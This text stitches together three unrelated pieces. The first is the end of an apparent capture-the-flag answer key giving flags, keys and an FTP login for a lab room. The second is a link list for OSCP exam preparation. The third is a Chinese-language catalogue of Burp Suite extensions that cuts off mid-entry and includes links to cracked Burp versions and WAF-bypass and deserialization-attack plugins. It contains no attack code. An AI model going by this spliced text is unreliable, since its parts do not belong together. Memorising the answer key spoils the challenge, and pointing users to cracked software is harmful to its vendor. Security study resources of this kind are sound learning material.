seconds ``` How many ports are open? `3` What is the operating system that runs on the target machine? `Ubuntu` ## Task 2 Web Here comes the web. Key to the looker room ![](./2020-11-15_15-29.png) `532219a04ab7a02b56faafbec1a4c1ea` Key to access the map `Grant_me_access_to_the_map_please` The Keeper Key `48ee41458eb0b43bf82b986cecf3af01` What is the filename of the text file (without the file extension) `you_made_it` ## Task 3 Help Mee Get that poor soul out of the cell. Who is locked up in the cell? `Joseph` There is something weird with the .wav file. What does it say? `SHOWME` What is the FTP Username `joseph` What is the FTP User Password `intotheterror445` ## Task 4 Crack it open Brute Brute Brute. The key used by the program `kidman` What do the crazy long numbers mean when there decrypted. `KIDMANSPASSWORDISSOSTRANGE` ## Task 5 Go Capture The Flag > > Root Me << user.txt `4C72A4EF8E6FED69C72B4D58431C4254` root.txt `BA33BDF5B8A3BFC431322F7D13F3361E` [Bonus] Defeat Ruvik `No answer needed` ## Task 6 Copyright material The images used in this CTF are obtained from: 1. The Fandom wiki under CC-BY-SA license. 2. User Wordridden at flickr.com under cc by 2.0 license. Congratulations you've complete the evil-within. This is the first room I've ever created so If you enjoyed it please give me a follow up on twitter (https://twitter.com/ShalindaFdo) and send me your feedback :). `No answer needed`
# OSCP in One Month ## Study Materials ### https://github.com/akenofu/OSCP-Cheat-Sheet ### https://cd6629.gitbook.io/ctfwriteups/cheatsheets/oscp-cheatsheet-unfinished ### https://casvancooten.com/posts/2020/05/oscp-cheat-sheet-and-command-reference/ ### https://www.noobsec.net/oscp-cheatsheet/ ### https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html ### https://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e ### https://medium.com/vieh-group/hacking-oscp-cheatsheet-ef63c43f919c ### https://blog.thehackingnomad.com/ ### https://forum.hackthebox.eu/discussion/3877/oscp-cheatsheet-including-cherrytree-notebook ### https://forum.hackthebox.eu/discussion/3877/oscp-cheatsheet-including-cherrytree-notebook ### https://oscp.securable.nl/post-exploitation ### https://hacksouth.africa/community/oscp-guide/ ### https://blog.adithyanak.com/oscp-preparation-guide ### https://github.com/The-Lynx-Team/OSCP ### https://github.com/ex16x41/OSCP-1 ### https://github.com/CyberSecurityUP/OSCP-Survival-Guide ### https://github.com/burntmybagel/OSCP-Prep ### https://github.com/strongcourage/oscp ### https://www.youtube.com/watch?v=_EYoYiSInSA&ab_channel=InfoCk ### https://www.youtube.com/watch?v=4rUN1F6_Mhk&ab_channel=NakerahNetwork ### https://steflan-security.com/complete-guide-to-stack-buffer-overflow-oscp/ ### https://github.com/V1n1v131r4/OSCP-Buffer-Overflow ### https://www.trenchesofit.com/2020/09/12/oscp-buffer-overflow-write-up/ ### https://www.udemy.com/course/practical-buffer-overflows-for-oscp/ ### https://infosecwriteups.com/tryhackme-oscp-buffer-overflow-prep-overflow-1-19e000482f27 ### https://infosecwriteups.com/tryhackme-oscp-buffer-overflow-prep-overflow-2-57c22b51a91f ### https://zsecurity.org/brainpan-buffer-overflow-oscp-prep/ ### https://oscp.infosecsanyam.in/buffer-overflow/buffer-overflow-step-by-step ### https://mdanilor.github.io/posts/oscp-bof/ ### https://www.youtube.com/watch?v=VpNaPAh93vE&ab_channel=Conda ### https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html ### https://www.youtube.com/watch?v=WKmbIhH9Wv8&ab_channel=MotasemHamdan ### https://www.youtube.com/watch?v=Qfy-traJwIs&ab_channel=Conda ### https://www.youtube.com/watch?v=bbB58LsL6pY&ab_channel=NakerahNetwork ### https://github.com/rhodejo/OSCP-Prep/blob/master/Priv-Esc.md ### https://github.com/C0nd4/OSCP-Priv-Esc ### https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ ### https://gitbook.brainyou.stream/basic-linux/linux-privilege-escalation ### https://weibell.github.io/reverse-shell-generator/ - https://gtfobins.github.io/ - https://gtfobins.github.io/ ## Reviews and Journey ### https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/ ### https://www.youtube.com/watch?v=Wqkr5S1b9gA&ab_channel=AdithyanAK ### https://www.youtube.com/watch?v=waUdifAzblE&ab_channel=BusraDemir ### https://www.youtube.com/watch?v=eLNYc-1ScdU&ab_channel=Alh4zr3d ### https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp ### https://bad-jubies.github.io/OSCP-Review/#:~:text=THE%20EXAM,machines%20with%20varying%20point%20values.&text=I%20scored%2035%20points%20from,over%20the%20next%2010%2B%20hours. ### https://netsec.ws/?p=398 ### https://infosecwriteups.com/how-i-passed-oscp-with-100-points-in-12-hours-without-metasploit-in-my-first-attempt-dc8d03366f33 ### https://steflan-security.com/my-oscp-journey/ ### https://www.linkedin.com/pulse/oscp-review-jonas-walker/ ### https://forum.hackthebox.eu/discussion/4884/my-oscp-review ### https://www.rcesecurity.com/2013/05/oscp-course-and-exam-review/ ### https://www.reddit.com/r/oscp/comments/acyumg/one_month_in_and_oscp_got_me_like_ill_clean_my/ ### https://www.cbtnuggets.com/blog/certifications/security/how-i-passed-the-oscp-on-the-first-try ### https://medium.com/@galolbardes/passing-the-oscp-while-working-full-time-29cb22d622e0 ### https://forum.hackthebox.eu/discussion/1730/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt ### https://rishabhchauhan.in/blog/my-oscp-journey - https://www.tripwire.com/state-of-security/security-awareness/oscp-journey/ ## Laboratories ### https://www.mindmeister.com/pt/1781013629/the-best-labs-and-ctf-red-team-and-pentest ### https://www.vulnhub.com/ ### https://www.hackthebox.eu/ ### https://tryhackme.com/ ### https://www.offensive-security.com/labs/ ## Social Networks ### https://www.linkedin.com/in/joas-antonio-dos-santos ### https://twitter.com/C0d3Cr4zy
# 所有收集类项目: - [收集的所有开源工具: sec-tool-list](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式 - [全平台逆向资源: awesome-reverse-engineering](https://github.com/alphaSeclab/awesome-reverse-engineering): - Windows平台安全: PE/DLL/DLL-Injection/Dll-Hijack/Dll-Load/UAC-Bypass/Sysmon/AppLocker/ETW/WSL/.NET/Process-Injection/Code-Injection/DEP/Kernel/... - Linux安全: ELF/... - macOS/iXxx安全: Mach-O/越狱/LLDB/XCode/... - Android安全: HotFix/XPosed/Pack/Unpack/Emulator/Obfuscate - 知名工具: IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/... - [攻击性网络安全资源: awesome-cyber-security](https://github.com/alphaSeclab/awesome-cyber-security): 漏洞/渗透/物联网安全/数据渗透/Metasploit/BurpSuite/KaliLinux/C&C/OWASP/免杀/CobaltStrike/侦查/OSINT/社工/密码/凭证/威胁狩猎/Payload/WifiHacking/无线攻击/后渗透/提权/UAC绕过/... - [网络相关的安全资源: awesome-network-stuff](https://github.com/alphaSeclab/awesome-network-stuff): - 网络通信: 代理/SS/V2ray/GFW/反向代理/隧道/VPN/Tor/I2P/... - 网络攻击: 中间人/PortKnocking/... - 网络分析: 嗅探/协议分析/网络可视化/网络分析/网络诊断等 - [开源远控和恶意远控分析报告: awesome-rat](https://github.com/alphaSeclab/awesome-rat): 开源远控工具: Windows/Linux/macOS/Android; 远控类恶意恶意代码的分析报告等 - [Webshell工具和分析/使用文章: awesome-webshell](https://github.com/alphaSeclab/awesome-webshell): Webshell资源收集, 包括150个Github项目, 200个左右文章 - [取证相关工具和文章: awesome-forensics](https://github.com/alphaSeclab/awesome-forensics): 近300个取开源取证工具,近600与取证相关文章 - [蜜罐资源: awesome-honeypot](https://github.com/alphaSeclab/awesome-honeypot): 250+个开源蜜罐工具,350+与蜜罐相关文章 - [Burp Suite资源: awesome-burp-suite](https://github.com/alphaSeclab/awesome-burp-suite): 400+个开源Burp插件,500+与Burp相关文章 # BurpSuite - 400+ 开源Burp插件,500+文章和视频。 - [English Version](https://github.com/alphaSeclab/awesome-burp-suite/blob/master/Readme_en.md) # 目录 - [工具](#39e9a0fe929fffe5721f7d7bb2dae547) - [(8) 收集](#6366edc293f25b57bf688570b11d6584) - [(89) 新添加](#5b761419863bc686be12c76451f49532) - [(170) 插件&&扩展](#6e42023365c5bdb7dc947efe3d7584ef) - [(51) 漏洞&&扫描](#90339d9a130e105e1617bff2c2ca9721) - [(24) 代理](#280b7fad90dd1238909425140c788365) - [(9) 日志](#19f0f074fc013e6060e96568076b7c9a) - [(11) XSS](#7a78bdcffe72cd39b193d93aaec80289) - [(8) Collaborator](#e0b6358d9096e96238b76258482a1c2f) - [(11) Fuzz](#e9a969fc073afb5add0b75607e43def0) - [(15) Payload](#fc5f535e219ba9694bb72df4c11b32bd) - [(10) SQL](#0481f52a7f7ee969fa5834227e49412e) - [(2) Android](#33431f1a7baa0f6193334ef4d74ff82c) - [(12) 其他](#01a878dcb14c47e0a1d05dc36ab95bfc) - [文章](#dab83e734c8176aae854176552bff628) - [(522) 新添加](#ad95cb0314046788911641086ec4d674) # <a id="39e9a0fe929fffe5721f7d7bb2dae547"></a>工具 *** ## <a id="6366edc293f25b57bf688570b11d6584"></a>收集 - [**1982**星][1y] [BitBake] [1n3/intruderpayloads](https://github.com/1n3/intruderpayloads) BurpSuite Intruder Payload收集 - [**1112**星][1y] [Py] [bugcrowd/hunt](https://github.com/bugcrowd/HUNT) Burp和ZAP的扩展收集 - [**1108**星][2m] [snoopysecurity/awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions) Burp扩展收集 - [**917**星][15d] [Batchfile] [mr-xn/burpsuite-collections](https://github.com/mr-xn/burpsuite-collections) BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程 - [**96**星][2y] [Java] [jgillam/burp-co2](https://github.com/jgillam/burp-co2) A collection of enhancements for Portswigger's popular Burp Suite web penetration testing tool. - [**87**星][9m] [Py] [laconicwolf/burp-extensions](https://github.com/laconicwolf/burp-extensions) A collection of scripts to extend Burp Suite - [**58**星][22d] [Py] [lich4/personal_script](https://github.com/lich4/personal_script) 010Editor/BurpSuite/Frida/IDA等多个工具的多个脚本 - [010Editor](https://github.com/lich4/personal_script/tree/master/010Editor_Script) 010Editor的多个脚本 - [ParamChecker](https://github.com/lich4/personal_script/tree/master/BurpSuite_Script) Burp插件 - [Frida](https://github.com/lich4/personal_script/tree/master/Frida_script) Frida多个脚本 - [IDA](https://github.com/lich4/personal_script/tree/master/IDA_Script) IDA Scripts - [IDA-read_unicode.py](https://github.com/lich4/personal_script/blob/master/IDA_Script/read_unicode.py) IDA插件,识别程序中的中文字符 - [IDA-add_xref_for_macho](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_xref_for_macho.py) 辅助识别Objective-C成员函数的caller和callee - [IDA-add_info_for_androidgdb](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_info_for_androidgdb.py) 使用gdbserver和IDA调试Android时,读取module列表和segment - [IDA-trace_instruction](https://github.com/lich4/personal_script/blob/master/IDA_Script/trace_instruction.py) 追踪指令流 - [IDA-detect_ollvm](https://github.com/lich4/personal_script/blob/master/IDA_Script/detect_ollvm.py) 检测OLLVM,在某些情况下修复(Android/iOS) - [IDA-add_block_for_macho](https://github.com/lich4/personal_script/blob/master/IDA_Script/add_block_for_macho.py) 分析macho文件中的block结构 - [**22**星][4y] [Java] [ernw/burpsuite-extensions](https://github.com/ernw/burpsuite-extensions) A collection of Burp Suite extensions *** ## <a id="5b761419863bc686be12c76451f49532"></a>新添加 - [**378**星][3m] [Java] [nccgroup/autorepeater](https://github.com/nccgroup/autorepeater) Automated HTTP Request Repeating With Burp Suite - [**376**星][2y] [Py] [0x4d31/burpa](https://github.com/0x4d31/burpa) A Burp Suite Automation Tool with Slack Integration. It can be used with Jenkins and Selenium to automate Dynamic Application Security Testing (DAST). - [**371**星][4y] [JS] [allfro/burpkit](https://github.com/allfro/burpkit) Next-gen BurpSuite penetration testing tool - [**299**星][1y] [Java] [vmware/burp-rest-api](https://github.com/vmware/burp-rest-api) REST/JSON API to the Burp Suite security tool. - [**265**星][3y] [Java] [codewatchorg/bypasswaf](https://github.com/codewatchorg/bypasswaf) Add headers to all Burp requests to bypass some WAF products - [**147**星][4m] [Java] [netsoss/headless-burp](https://github.com/netsoss/headless-burp) Automate security tests using Burp Suite. - [**141**星][1y] [Java] [tomsteele/burpbuddy](https://github.com/tomsteele/burpbuddy) burpbuddy exposes Burp Suites's extender API over the network through various mediums, with the goal of enabling development in any language without the restrictions of the JVM - [**118**星][1m] [Java] [nccgroup/decoder-improved](https://github.com/nccgroup/decoder-improved) Improved decoder for Burp Suite - [**111**星][22d] [Java] [ozzi-/jwt4b](https://github.com/ozzi-/JWT4B) JWT Support for Burp - [**110**星][2y] [Java] [x-ai/burpunlimitedre](https://github.com/x-ai/burpunlimitedre) This project !replace! BurpUnlimited of depend (BurpSutie version 1.7.27). It is NOT intended to replace them! - [**103**星][7m] [Py] [kibodwapon/noeye](https://github.com/kibodwapon/noeye) A blind mode exploit framework (a dns server and a web app) that like wvs's AcuMonitor Service or burpsuite's collabrator or cloudeye - [**99**星][4y] [Java] [summitt/burp-ysoserial](https://github.com/summitt/burp-ysoserial) YSOSERIAL Integration with burp suite - [**84**星][2y] [Java] [yandex/burp-molly-pack](https://github.com/yandex/burp-molly-pack) Security checks pack for Burp Suite - [**82**星][6y] [Py] [mwielgoszewski/burp-protobuf-decoder](https://github.com/mwielgoszewski/burp-protobuf-decoder) A simple Google Protobuf Decoder for Burp - [**81**星][8m] [Py] [leoid/matchandreplace](https://github.com/leoid/matchandreplace) Match and Replace script used to automatically generate JSON option file to BurpSuite - [**70**星][6y] [Java] [irsdl/burpsuitejsbeautifier](https://github.com/irsdl/burpsuitejsbeautifier) Burp Suite JS Beautifier - [**70**星][2m] [Py] [ziirish/burp-ui](https://github.com/ziirish/burp-ui) a web-ui for burp backup written in python with Flask and jQuery/Bootstrap - [**68**星][3y] [Py] [stayliv3/burpsuite-changeu](https://github.com/stayliv3/burpsuite-changeu) burpsuite 插件。将返回值中的unicode明文 - [**59**星][5y] [Ruby] [tduehr/buby](https://github.com/tduehr/buby) A JRuby implementation of the BurpExtender interface for PortSwigger Burp Suite. - [**53**星][2m] [Java] [coreyd97/stepper](https://github.com/coreyd97/stepper) A natural evolution of Burp Suite's Repeater tool - [**52**星][5y] [Py] [jfoote/burp-git-bridge](https://github.com/jfoote/burp-git-bridge) Store Burp data and collaborate via git - [**50**星][2m] [Java] [portswigger/stepper](https://github.com/portswigger/stepper) A natural evolution of Burp Suite's Repeater tool - [**48**星][1y] [java] [anbai-inc/burpstart](https://github.com/anbai-inc/burpstart) Burp 启动加载器 - [**46**星][2m] [Py] [hvqzao/report-ng](https://github.com/hvqzao/report-ng) Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base. - [**45**星][1y] [Ruby] [pentestgeek/burpcommander](https://github.com/pentestgeek/burpcommander) Ruby command-line interface to Burp Suite's REST API - [**42**星][11m] [Java] [secdec/attack-surface-detector-burp](https://github.com/secdec/attack-surface-detector-burp) The Attack Surface Detector uses static code analyses to identify web app endpoints by parsing routes and identifying parameters - [**41**星][12m] [Py] [zynga/hiccup](https://github.com/zynga/hiccup) [DEPRECATED] Hiccup is a framework that allows the Burp Suite (a web application security testing tool, - [**41**星][6y] [PHP] [spiderlabs/upnp-request-generator](https://github.com/spiderlabs/upnp-request-generator) A tool to parse UPnP descriptor XML files and generate SOAP control requests for use with Burp Suite or netcat - [**40**星][11m] [Go] [joanbono/gurp](https://github.com/joanbono/gurp) Burp Commander written in Go - [**39**星][8m] [Dockerfile] [marco-lancini/docker_burp](https://github.com/marco-lancini/docker_burp) Burp Pro as a Docker Container - [**38**星][2m] [Py] [zephrfish/burpfeed](https://github.com/zephrfish/burpfeed) Hacked together script for feeding urls into Burp's Sitemap - [**36**星][8y] [Py] [gdssecurity/burpee](https://github.com/gdssecurity/burpee) Python object interface to requests/responses recorded by Burp Suite - [**36**星][8y] [C#] [gdssecurity/wcf-binary-soap-plug-in](https://github.com/gdssecurity/wcf-binary-soap-plug-in) a Burp Suite plug-in designed to encode and decode WCF Binary Soap request and response data ("Content-Type: application/soap+msbin1) - [**35**星][7y] [Java] [continuumsecurity/resty-burp](https://github.com/continuumsecurity/resty-burp) REST/JSON interface to Burp Suite - [**35**星][1y] [Java] [bit4woo/resign](https://github.com/bit4woo/ReSign) A burp extender that recalculate signature value automatically after you modified request parameter value. - [**33**星][3y] [Go] [tomsteele/burpstaticscan](https://github.com/tomsteele/burpstaticscan) Use burp's JS static code analysis on code from your local system. - [**32**星][10m] [twelvesec/bearerauthtoken](https://github.com/twelvesec/bearerauthtoken) This burpsuite extender provides a solution on testing Enterprise applications that involve security Authorization tokens into every HTTP requests.Furthermore, this solution provides a better approach to solve the problem of Burp suite automated scanning failures when Authorization tokens exist. - [**28**星][2y] [Java] [bit4woo/gui_burp_extender_para_encrypter](https://github.com/bit4woo/gui_burp_extender_para_encrypter) Burp_Extender_para_encrypter - [**28**星][4y] [Java] [burp-hash/burp-hash](https://github.com/burp-hash/burp-hash) a Burp Suite plugin. - [**28**星][4y] [Py] [smeegesec/burp-importer](https://github.com/smeegesec/burp-importer) Burp Suite Importer - Connect to multiple web servers while populating the sitemap. - [**28**星][6m] [Java] [bit4woo/burp-api-drops](https://github.com/bit4woo/burp-api-drops) burp suite API 处理http请求和响应的基本流程 - [**25**星][3y] [Java] [pokeolaf/pokemongodecoderforburp](https://github.com/pokeolaf/pokemongodecoderforburp) A simpe decoder to decode requests/responses made by PokemonGo in burp - [**22**星][7m] [Java] [ettic-team/endpointfinder-burp](https://github.com/ettic-team/endpointfinder-burp) burp plugin to find endpoint - [**22**星][2y] [Java] [silentsignal/burp-uuid](https://github.com/silentsignal/burp-uuid) UUID issues for Burp Suite - [**21**星][5y] [Java] [khai-tran/burpjdser](https://github.com/khai-tran/burpjdser) a Burp plugin that will deserialze/serialize Java request and response to and from XML with the use of Xtream library - [**21**星][2m] [Java] [portswigger/json-web-tokens](https://github.com/portswigger/json-web-tokens) JWT Support for Burp - [**18**星][7y] [Java] [omercnet/burpjdser-ng](https://github.com/omercnet/burpjdser-ng) BurpJDSer-ng - [**18**星][2m] [Java] [silentsignal/burp-json-jtree](https://github.com/silentsignal/burp-json-jtree) JSON JTree viewer for Burp Suite - [**18**星][2m] [Py] [xscorp/burpee](https://github.com/xscorp/burpee) A python module that accepts an HTTP request file and returns a dictionary of headers and post data - [**17**星][3m] [BitBake] [sy3omda/burp-bounty](https://github.com/sy3omda/burp-bounty) is extension of Burp Suite that improve Burp scanner. - [**16**星][2y] [Visual Basic .NET] [xcanwin/xburpcrack](https://github.com/xcanwin/xburpcrack) This is a tool to bypass the cracked version of the burpsuite_pro(Larry_Lau) certification deadline through time reversal. - [**15**星][11m] [Java] [portswigger/auto-repeater](https://github.com/portswigger/auto-repeater) Automated HTTP Request Repeating With Burp Suite - [**14**星][7m] [Java] [portswigger/openapi-parser](https://github.com/portswigger/openapi-parser) Parse OpenAPI specifications, previously known as Swagger specifications, into the BurpSuite for automating RESTful API testing – approved by Burp for inclusion in their official BApp Store. - [**13**星][14d] [Java] [ankokuty/belle](https://github.com/ankokuty/belle) Belle (Burp Suite 非公式日本語化ツール) - [**13**星][6y] [Java] [ioactive/burpjdser-ng](https://github.com/ioactive/burpjdser-ng) Allows you to deserialize java objects to XML and lets you dynamically load classes/jars as needed - [**13**星][2y] [Java] [netspi/jsonbeautifier](https://github.com/netspi/jsonbeautifier) JSON Beautifier for Burp written in Java - [**12**星][2y] [Java] [portswigger/json-beautifier](https://github.com/portswigger/json-beautifier) JSON Beautifier for Burp written in Java - [**11**星][9m] [Py] [anandtiwarics/python-burp-rest-api](https://github.com/anandtiwarics/python-burp-rest-api) Python Package for burprestapi - [**11**星][2y] [Java] [gozo-mt/burplist](https://github.com/gozo-mt/burplist) A jython wordlist creator in-line with Burp-suite - [**10**星][3y] [Java] [portswigger/bypass-waf](https://github.com/portswigger/bypass-waf) Add headers to all Burp requests to bypass some WAF products - [**10**星][2y] [Py] [sahildhar/burpextenderpractise](https://github.com/sahildhar/BurpExtenderPractise) burp extender practise - [**8**星][3y] [Java] [silentsignal/burp-cfurl-cache](https://github.com/silentsignal/burp-cfurl-cache) CFURL Cache inspector for Burp Suite - [**7**星][2y] [Java] [jgillam/serphper](https://github.com/jgillam/serphper) Serialized PHP toolkit for Burp Suite - [**6**星][10m] [raspberrypilearning/burping-jelly-baby](https://github.com/raspberrypilearning/burping-jelly-baby) Make a Jelly Baby burp by pressing it! - [**6**星][11m] [chef-koch/windows-redstone-4-1803-data-analysis](https://github.com/chef-koch/windows-redstone-4-1803-data-analysis) Explains the telemetry, opt-out methods and provides some Whireshark/Burp dumps in order to see what MS really transmit - [**5**星][4y] [Py] [cyberdefenseinstitute/burp-msgpack](https://github.com/cyberdefenseinstitute/burp-msgpack) MessagePack converter - [**5**星][2y] [Java] [silentsignal/burp-commentator](https://github.com/silentsignal/burp-commentator) Generates comments for selected request(s) based on regular expressions - [**4**星][7y] [Py] [dnet/burp-gwt-wrapper](https://github.com/dnet/burp-gwt-wrapper) Burp Suite GWT wrapper - [**4**星][2y] [Ruby] [geoffwalton/burp-command](https://github.com/geoffwalton/burp-command) - [**4**星][2y] [Java] [silentsignal/burp-git-version](https://github.com/silentsignal/burp-git-version) - [**4**星][6m] [Java] [virusdefender/burptime](https://github.com/virusdefender/burptime) Burp Show Response Time - [**4**星][12d] [Java] [gdgd009xcd/automacrobuilder](https://github.com/gdgd009xcd/automacrobuilder) multi step request sequencer AutoMacroBuilder for burpsuite - [**3**星][6y] [Java] [directdefense/noncetracker](https://github.com/directdefense/noncetracker) A Burp extender module that tracks and updates nonce values per a specific application action. - [**3**星][3y] [Batchfile] [jas502n/burpsuite_pro_v1.7.11-crack](https://github.com/jas502n/burpsuite_pro_v1.7.11-crack) BurpSuite_pro_v1.7.11-Crack 破解版 抓包神器 - [**3**星][2y] [Py] [niemand-sec/burp-scan-them-all](https://github.com/niemand-sec/burp-scan-them-all) Small script for automatizing Burp with Carbonator and slack - [**2**星][1y] [Py] [bao7uo/burpelfish](https://github.com/bao7uo/burpelfish) BurpelFish - Adds Google Translate to Burp's Context Menu. "Babel Fish" language translation for app-sec testing in other languages. - [**2**星][2y] [Java] [cornerpirate/demoextender](https://github.com/cornerpirate/demoextender) Code used for a tutorial to get Netbeans GUI editor to work with a Burp Suite Extender - [**2**星][2y] [Py] [dnet/burp-scripts](https://github.com/dnet/burp-scripts) Scripts I wrote to extend Burp Suite functionality - [**2**星][5y] [Shell] [evilpacket/bower-burp-static-analysis](https://github.com/evilpacket/bower-burp-static-analysis) Nov 2014 scan of bower using burp suite static analysis engine - [**2**星][6y] [Py] [meatballs1/burp_wicket_handler](https://github.com/meatballs1/burp_wicket_handler) - [**2**星][4y] [Py] [mwielgoszewski/burp-jython-tab](https://github.com/mwielgoszewski/burp-jython-tab) - [**2**星][1y] [Java] [peachtech/peachapisec-burp](https://github.com/peachtech/peachapisec-burp) Peach API Security Burp Integration - [**1**星][2y] [Java] [sampsonc/perfmon](https://github.com/sampsonc/perfmon) Performance metrics for Burp Suite - [**1**星][30d] [Java] [bytebutcher/burp-send-to](https://github.com/bytebutcher/burp-send-to) Adds a customizable "Send to..."-context-menu to your BurpSuite. - [**0**星][2y] [Java] [adityachaudhary/phantom-cryptor](https://github.com/adityachaudhary/phantom-cryptor) Burp Suite extender to encrypt requests and decrypt response. - [**0**星][1y] [jgamblin/burptest](https://github.com/jgamblin/burptest) - [**0**星][2y] [kkirsche/burp_suite_lists](https://github.com/kkirsche/burp_suite_lists) Lists to use with Burp Suite - [**0**星][3y] [Java] [luj1985/albatross](https://github.com/luj1985/albatross) XML Fast Infoset decoder for Burp Suite - [**0**星][2y] [Java] [silentsignal/burp-asn1](https://github.com/silentsignal/burp-asn1) ASN.1 toolbox for Burp Suite *** ## <a id="6e42023365c5bdb7dc947efe3d7584ef"></a>插件&&扩展 - [**730**星][2y] [JS] [xl7dev/burpsuite](https://github.com/xl7dev/burpsuite) BurpSuite using the document and some extensions - [**715**星][1y] [Java] [d3vilbug/hackbar](https://github.com/d3vilbug/hackbar) HackBar plugin for Burpsuite - [**605**星][10m] [Java] [c0ny1/chunked-coding-converter](https://github.com/c0ny1/chunked-coding-converter) Burp suite 分块传输辅助插件 - [**445**星][7m] [Py] [albinowax/activescanplusplus](https://github.com/albinowax/activescanplusplus) ActiveScan++ Burp Suite Plugin - [**410**星][8m] [Java] [nccgroup/burpsuitehttpsmuggler](https://github.com/nccgroup/burpsuitehttpsmuggler) A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques - [**366**星][23d] [Java] [portswigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler) an extension for Burp Suite designed to help you launch HTTP Request Smuggling attack - [**364**星][14d] [Kotlin] [portswigger/turbo-intruder](https://github.com/portswigger/turbo-intruder) a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. - [**359**星][5m] [Java] [bit4woo/domain_hunter](https://github.com/bit4woo/domain_hunter) 利用burp收集整个企业、组织的域名(不仅仅是单个主域名)的插件 - [**341**星][2y] [Py] [securityinnovation/authmatrix](https://github.com/securityinnovation/authmatrix) AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services. - [**340**星][2y] [Py] [pathetiq/burpsmartbuster](https://github.com/pathetiq/burpsmartbuster) A Burp Suite content discovery plugin that add the smart into the Buster! - [**336**星][23d] [Java] [bit4woo/knife](https://github.com/bit4woo/knife) A burp extension that add some useful function to Context Menu 添加一些右键菜单让burp用起来更顺畅 - [**310**星][1y] [Java] [ebryx/aes-killer](https://github.com/ebryx/aes-killer) Burp plugin to decrypt AES Encrypted traffic of mobile apps on the fly - [**273**星][2m] [Py] [quitten/autorize](https://github.com/quitten/autorize) Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests - [**257**星][3m] [Py] [rhinosecuritylabs/iprotate_burp_extension](https://github.com/rhinosecuritylabs/iprotate_burp_extension) Extension for Burp Suite which uses AWS API Gateway to rotate your IP on every request. - [**250**星][1m] [Java] [c0ny1/jsencrypter](https://github.com/c0ny1/jsencrypter) 一个用于加密传输爆破的Burp Suite插件 - [**246**星][5m] [Py] [initroot/burpjslinkfinder](https://github.com/initroot/burpjslinkfinder) Burp Extension for a passive scanning JS files for endpoint links. - [**244**星][3m] [Java] [c0ny1/passive-scan-client](https://github.com/c0ny1/passive-scan-client) Burp被动扫描流量转发插件 - [**238**星][3m] [Java] [samlraider/samlraider](https://github.com/samlraider/samlraider) SAML2 Burp Extension - [**191**星][2y] [Java] [p3gleg/pwnback](https://github.com/P3GLEG/PwnBack) Burp Extender plugin that generates a sitemap of a website using Wayback Machine - [**175**星][2y] [Py] [virtuesecurity/aws-extender](https://github.com/virtuesecurity/aws-extender) a Burp plugin to assess permissions of cloud storage containers on AWS, Google Cloud and Azure. - [**174**星][3m] [Java] [lilifengcode/burpsuite-plugins-usage](https://github.com/lilifengcode/burpsuite-plugins-usage) Burpsuite-Plugins-Usage - [**160**星][1m] [Py] [regala/burp-scope-monitor](https://github.com/regala/burp-scope-monitor) Burp Suite Extension to monitor new scope - [**159**星][5m] [Java] [netspi/javaserialkiller](https://github.com/netspi/javaserialkiller) Burp extension to perform Java Deserialization Attacks - [**158**星][1y] [Py] [bayotop/off-by-slash](https://github.com/bayotop/off-by-slash) Bupr扩展, 检测利用Nginx错误配置导致的重名遍历(alias traversal) - [**157**星][7m] [Py] [thekingofduck/burpfakeip](https://github.com/thekingofduck/burpfakeip) 一个用于伪造ip地址进行爆破的Burp Suite插件 - [**149**星][3y] [Java] [mwielgoszewski/jython-burp-api](https://github.com/mwielgoszewski/jython-burp-api) Develop Burp extensions in Jython - [**143**星][6m] [Py] [codingo/minesweeper](https://github.com/codingo/minesweeper) A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking). - [**137**星][2y] [Java] [netspi/wsdler](https://github.com/netspi/wsdler) WSDL Parser extension for Burp - [**123**星][4y] [Py] [moloch--/csp-bypass](https://github.com/moloch--/csp-bypass) A Burp Plugin for Detecting Weaknesses in Content Security Policies - [**121**星][1m] [Py] [redhuntlabs/burpsuite-asset_discover](https://github.com/redhuntlabs/burpsuite-asset_discover) Burp Suite extension to discover assets from HTTP response. - [**119**星][6y] [Py] [meatballs1/burp-extensions](https://github.com/meatballs1/burp-extensions) Burp Suite Extensions - [**118**星][2m] [Py] [prodigysml/dr.-watson](https://github.com/prodigysml/dr.-watson) a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! - [**103**星][2y] [Java] [clr2of8/gathercontacts](https://github.com/clr2of8/gathercontacts) A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results - [**103**星][2y] [Java] [gosecure/csp-auditor](https://github.com/gosecure/csp-auditor) Burp and ZAP plugin to analyse Content-Security-Policy headers or generate template CSP configuration from crawling a Website - [**102**星][3m] [Java] [netspi/burp-extensions](https://github.com/netspi/burp-extensions) Central Repo for Burp extensions - [**95**星][19d] [Py] [m4ll0k/burpsuite-secret_finder](https://github.com/m4ll0k/burpsuite-secret_finder) Burp Suite extension to discover apikeys/accesstokens and sensitive data from HTTP response. - [**89**星][3y] [Java] [dobin/burpsentinel](https://github.com/dobin/burpsentinel) GUI Burp Plugin to ease discovering of security holes in web applications - [**89**星][8m] [Py] [lopseg/jsdir](https://github.com/Lopseg/Jsdir) a Burp Suite extension that extracts hidden paths from js files and beautifies it for further reading. - [**88**星][2y] [Java] 